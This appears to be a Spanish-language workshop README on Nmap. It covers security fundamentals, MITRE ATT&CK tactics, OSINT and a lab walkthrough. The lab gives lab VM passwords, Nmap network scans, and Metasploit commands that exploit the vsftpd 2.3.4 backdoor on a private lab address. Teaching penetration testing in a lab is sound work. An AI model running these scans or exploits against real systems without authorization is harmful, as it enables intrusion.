# Taller NMAP

## Explicación rapida de las bases de la seguridad

- Cada 14 segundos hay un ataque de seguridad

- C.R recibió 700 millones de ataque en el primer semestre

- Solo 1% de las empresas de America latina tienen un departamento dedicado a la seguridad

## Datos de C.R en 2020

- 5.07 millones de habitantes en C.R
- 9.05 millones de líneas telefonicas 
- 3.67 millones de usuarios de internet
- 3.7 millones de usuarios en redes sociales 

## Seguridad de la info se basa en 3 dimesnsiones/ pilares

- Confidencialidad
- Integridad
- Disponibilidad
- Autenticación
- No repudio

## Nivel de seguridad definida por 3 componentes principales:

Seguridad, Funcionalidad, Usabilidad

## Defensa en profundidad

- Politicas
- Procedimientos
- Seguridad física
- Perimetro
- Internal network
- Host
- Aplicacations
- Data

## NMAP nos sirve para conocer nuestras vulnerabilidades para ir un paso adelante en tema de seguridad

Todo ataque tiene un motivo o meta:

- Interrumpir la continuidad del negocio
- Robo de activos
- Manipulación de datos
- Robo de identidades corporativas
- Propagación de creencias religiosas y políticas 
- Alcanzar objetivos militares
- Dañar la reputación de una empresa
- Revanchas

## 10 vectores de ataques

El correo electrónico es el medio por el cual se inician los ataques de ingeniería social

1. Cloud computing threats
2. Advance persistant threats
3. Virus and worms
4. Ransomware
5. Mobile Threats
6. Botnet
7. Inside attack
8. Phishing
9. Web application threats
1. Internet of things

## Tácticas de Mitre ATT&CK

- Acceeso inicial
- Ejecución
- Persistencia
- Escalación de privilegios
- Evación de defensa
- Acceso a credenciales
- Descubrimiento
- Movimiento lateral
- Recolección
- Comando y control
- Exfiltración
- Impacto

![Tácticas](./images/tacticas.png)

## Tipos de atacantes

- Organized hacker
- Industrial spies
- Script kiddles
- Hacktivists
- Cyber terrorists
- State-sponsed attackers
- Insider threats
- Suicide hackers
- Recreational Hackers

## Ataque y Defensa-El mundo de colores

1. Red team:
- Vulnerability Assesment & Penetration Testing
- Threat Hunting
- Exploit Developments
- Exploit Cyber threat intelligence
- Social engeneering
1. Purple team
- Red team and Blue team working collaborative to improve the cybersecurity posture of the organization
1. Blue team
- Incident responders
- Security operations
- IT network & Systems CIO & CISCO office

# Analogía:

Si tuviese 6 horas para cortar un arbol, me pasaría las primeras 4 afilando el hacha

![footprint](./images/foot.png)

## Footprinting

Principal objetivo: obtener información general de la entidad así como el conjunto de activos sobre los que se desarrollará pruebas posteriormente.

## Footprinting tools
- Busquedas alternativas:

    * Sublist3r
    * Amass
    * Google transparency

- Servicios que podrían ser analizados (enumeración de usuarios):

    * Pastebin
    * GitHub


## OSINT

+ Es el análisis e inteligencia

+ Es el proceso por el cual recopilamos información de fuentes abiertas

## Fases OSINT (pasiva - semi pasiva - activa)

+ Inteligencia
+ Requisitos 
+ Fuentes de información
+ Adquisición
+ Procesamiento
+ Análisis

![](images/osint.png)

## Reconocimiento activo

Recopilar información adicional del objetivo, se llama enumeración, se hace en las pruebas de penetración

## Tipos de escaneo Nmap

- Escaneo de conexión TCP (-sT)
- Escaneo UDP (-sU)
- Escaneo TCP FIN (-sF)
- Escaneo de descubrimiento de host (-sn)
- Opciones de sincronización (-T 0-5)

![escaneo](./images/escaneo.png)

# Taller práctico

## Abrimos VMware máquina Kali

usuario: kali
contraseña: kali

Terminal:

```bash
    su
```
Contraseña: Hacking$01

Para ver documentación de nmap

```bash
    man nmap 
```

Algunos comandos de la documentación:

-A: to enable OS and version detection.

-O: Enable OS detection

-p <port ranges>: Only scan specified ports

Para ver ip en Linux:

```bash
    ifconfig
```

Para ver todos los dispositivos de red una vez dentro con nmap

```bash
    nmap -sn 10.60.30.0/24 
```

Para atacar máquina específica

```bash
    nmap -A 10.60.30.244 
``` 

![Máquinas](./images/1.jpg)

Página para ver vulneraciones: version vsftpd 2.3.4

`www.exploit-db.com`

![Página](./images/3.jpg)


Ingresamos al ícono de kali

Ingresamos msf en la búsqueda

contraseña: kali

```bash
    search vsftpd
```

Copiamos la dirección

```bash
    use exploit/unix/ftp/vsftpd_234_backdoor
```

Una vez dentro de exploid: `options` 

Establecemos variable:

```bash
    set RHOST 10.60.30.242
```

Corremos `exploit`

![Ataque](./images/2.jpg)


## Recomendación de página para cursos:

`Skills for All with Cisco`


























